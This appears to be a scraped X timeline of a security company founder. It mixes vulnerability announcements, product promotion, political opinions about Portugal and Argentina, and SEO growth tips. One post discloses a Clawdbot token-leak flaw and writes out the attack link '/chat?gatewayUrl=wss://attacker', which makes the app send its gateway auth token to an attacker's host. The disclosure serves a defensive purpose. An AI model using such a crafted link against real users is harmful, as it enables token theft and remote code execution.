Jorge Monteiro

@steipete No, vulns happen always. But vendors shall be responsible for testing their products. In this case we tested it for you. You’re welcome

@jbmonteiro Look at the software industry, you think vulnerabilities only happen in the old ways? If you read the security docs and configure gateway how it’s designed (in your secure network only) this issue doesn’t apply.

📢 Confession: I ship code I never read. Here's my 2025 workflow. steipete.me/posts/2025/shi…

🚨We found RCE in Clawdbot 🚨 If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.  The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian". Here's how it went down 👇 We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load. Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏 On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token! Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇 ethiack.com/news/blog/one-…

Hackian just uncovered a high-severity vulnerability and achieved 1-click RCE in @openclaw (previously Clawdbot), fully autonomously, in under 2 hours. We explain how and show you Hackian’s thought process in our latest blog: ethiack.com/news/blog/one-…

We’ve just analyzed 50,000 assets from European Retail companies. And there are some concerning data points: 16% of connections use invalid or outdated SSL certificates. 17% of web servers expose their version number, easing criminal exploitation. Medium-sized retailers, in the 1000-5000 employee range, have the worst posture. Our new “State of Digital Exposure for European Retail” report uses this data, industry trends, and insights from experts at Nemlig, Carrefour, and others to show what’s to come in Retail. Read the report and find out what you have to do to stop being a statistic. Fully accessible here: ethiack.com/news/blog/digi…

In the AI era, traditional security scanners are obsolete.  Ethiack CEO and Founder Jorge Monteiro discusses the transition to autonomous technology that mimics the behavior of real hackers 👇

We’re now detecting the new MongoDB's Memory Exposure Vulnerability. This CVSS 8.7 vulnerability lets unauthenticated attackers read uninitialized heap memory from MongoDB servers, without needing credentials. Affected versions span MongoDB 3.6 through 8.2. If you're running any of these versions, your database is exposed. We’re already detecting this vulnerability across your attack surface, so if you’re unsure you’re exposed, check your dashboard. More info on the CVE here: ethiack.com/news/product/m…

@levelsio @philipcurryo @ethiack we can autonomously pentest your systems continuously. I am sure we will hack your vibe code applications.

@philipcurryo Give me one example where AI agents actually can do something useful except AI spam replies and AI spam emails for outbound sales?

It’s absolutely insane how behind the curve X is on agents Never seen anything like it It’s like saying “yeah the internet is cool but I have no ideas” in the 90s

This week two massive CVEs affecting React and Next.js were released, with massive repercussions. CVE-2025-55182 and CVE-2025-66478 are critical unauthenticated RCE vulnerabilities affecting even default configurations. After the CVE was announced, we've begun working on a testing module, and we've started testing customers today. If you use React or Next.js, please upgrade to an hardened release immediately.

@levelsio If you are selected with that application, I quit Europe for good

🇪🇺 As a European citizen and AI founder, I can apparently use these "AI Factories", so I just signed up to use them! Every "supercomputer" has an [ ACCESS NOW ] button which made me very excited I expected to sign up, maybe pay a discounted H100 rate (funded by EU, that'd be nice?) and get a Jypyter notebook, or some SSH login so I can access my GPU like I'd do on @lambdaapi or @awscloud or @Hetzner_Online But I celebrated to early, I signed up, confirmed my email, then ended up in a "Supercomputer Access Calls" page, where I had to select from a tedious list of "Call For Proposals" to get access to a GPU So I could NOT just access a H100 GPU, I have to make sure my project (in this case my business) fits a specific proposal, ok fair This process was already tedious enough but then when I tried to actually go through with it, it started asking me if I had "Respect for Human Agency?", I do I think, and if I was mindful of "Individual, and Social and Environmental Well-Being?", well I am, right guys??? Right??? The questions didn't stop, just endless pages of this Look I get what they're doing, they pivoted the classic university "I need to rent a giant computer for my research" to an EU wide thing and then present it as the "European AI plan" But this isn't really how AI works in production? As a founder in AI, if I wanna do stuff I'd rent a whole bunch H100 GPUs again at @lambdaapi or @awscloud or @Hetzner_Online and SSH into a box Or if I want it more simple I run AI models on @FAL, @wavespeed or @replicate which is just an API call or web front end I can click stuff and run a model The EU has the right intentions here but it's just the wrong execution, this thing will 100% go nowhere, and I'm a born optimist, I want to believe, I'm also a proud European, and I'm in AI a bit and not a complete idiot. There's just better ways to do this If you really want to have the GPU servers in Europe (which arguably isn't that important), then let me rent a GPU box with SSH access at @Hetzner_Online or @OVHcloud that's hosted in Europe and subsidize that for European citizens and European businesses. I don't even believe in that, but at least that'd make it accessible for Europeans. Now it really isn't? What's REALLY much more important though if you want to be a part of the AI race and I've posted for years here with @euaccofficial is to make Europe a really extremely attractive place to start and run an AI business. Remove regulatory obstructions and give tax discounts for startups. Let them build a business first that can compete worldwide and once they make enough money (let's say $100M/y), then slowly start adding regulation. Because right now the regulation only benefits the European incumbents, the dinosaur companies, while making it very difficult for European citizens to start new AI companies here. Which is why we literally have none left. Anyway, I applied to get my GPU, let's see if I get it!

You’re about to see the world’s first show & tell from a hackbot. Enjoy!

Big things brewing in Lisbon: @ethiack and my friend @0xacb are putting together a massive in person conference! It's all about hacking, security, and AI. Speakers from @hacker0x01, @bedrocksec, @0xLupin and more. Solid crew, great vibes. 👉🏼 hackaicon.com

Elon and Steve Jobs are both famous for pushing people to simplify their designs. I don't think this is a coincidence. Large organizations naturally generate complexity, but if you have a CEO who hates it, this tendency is kept in check.

@levelsio Portugal is a paradise land governed by demons

Immigrants in Portugal are just the scapegoat for a dysfunctional government and corrupt system that doesn't build housing, makes it impossible for Portuguese to start or run businesses This means no jobs created so no job opportunities for them, and no houses built so no places to live for them. Which results in most young Portuguese leaving the country at age 18-25 Before the scapegoat was the digital nomads, and before that the Brazilians. Now it's the South Asian immigrants Portuguese love to blame foreigners for the problems their own government has created Every problem in Portugal is an extreme version of Europe's problems as a whole btw

🚨🇦🇷MILEI’S “CRAZY” PLAN WORKED—ARGENTINA’S PAYCHECKS JUST HIT A 6-YEAR HIGH Private sector wages in Argentina just spiked to their best level since 2018—real wages hit 107 in Feb 2025, up from a sad 91 in late 2023. What changed? Oh, just Milei dropping economic reforms like they were hot. People called it “shock therapy.” Turns out, it was more “money therapy.” Critics yelled, “He’ll crash the economy!” Workers are now yelling, “Payday!” Love him or hate him, Milei’s free-market rollercoaster is actually handing folks fatter checks—for the first time in forever. Source: Observatory of Employment and Business Dynamics, @JMilei, @ArgMilei

A bola nao tem de ir ao povo, o povo vem à bola

"2€ a #boladeberlim é um roubo" they say

@johnrushx Interested!

SEO is simple but not easy. 4 months ago, I quietly launched llmmodels.org. It took a while but started growing and really took off a week ago. Here is my process: 1. Domain name - matches a keyword with high traffic and low competition (only .com/.org/.ai). 2. Website runs on SEO-optimized CMS (I run them on Unicorn Platform). 3. Domain Rating must be > 10. Earn 100+ backlinks. (I used ListingBott). 4. Scrape or manually curate the directory items. This one is really important. The quality of items must be high. 5. Launch on PH, IH, HN, DevTo, Reddit, X, LD (for clicks and for backlinks for SEO). 6. Run SeoBotAI for blog articles. Wait for a month. Find top articles and manually improve them to make them even better. 7. Run an indexing tool to get pages indexed by google faster ( I used my own IndexRusher . com) 8. See top keywords driving traffic to each page and place those keywords into meta title/description/h1. Do it for top 10 pages every month. 9. Keep updating the database with fresh items. 10. Make more directories to interlink them all and grow even better with SEO. -- I'm working on a "Directory Incubator" program launching in early Sept. - 4 weeks - paid - best directory will get my sponsorship for a year I'll pick about 50 people for the first batch—maybe less. Reply to this post and I'll DM you application form once it's live.

@johnrushx Count me in

I'm launching a Directory BuilderVerse. - the builder & templates for jobboards, lists, launchpads, courses, info sites, help desks, blogs, programmatic SEO. Every SaaS maker should have few directories to channel traffic, passive income & backlinks. But here is the coolest part: 1. I'll also launch an incubator, "Directory as a side project," thing to help others launch directories and grow them using SEO, viral marketing, collabs, etc. (90-day batches). 2. The best directory of the batch will win prizes(money, fame and coupons for my tools) I'm working out the details by running a small batch already and learning by doing. 3. The program will be paid(small sum, to make sure I filter out those who aren't serious about the thing). >>> Join the waitlist by replying.

If you are in SaaS in 2024, and you are not investing in cybersecurity you are irresponsible Doing technology without testing is careless. You are putting yourself and your customers in danger. Change my mind.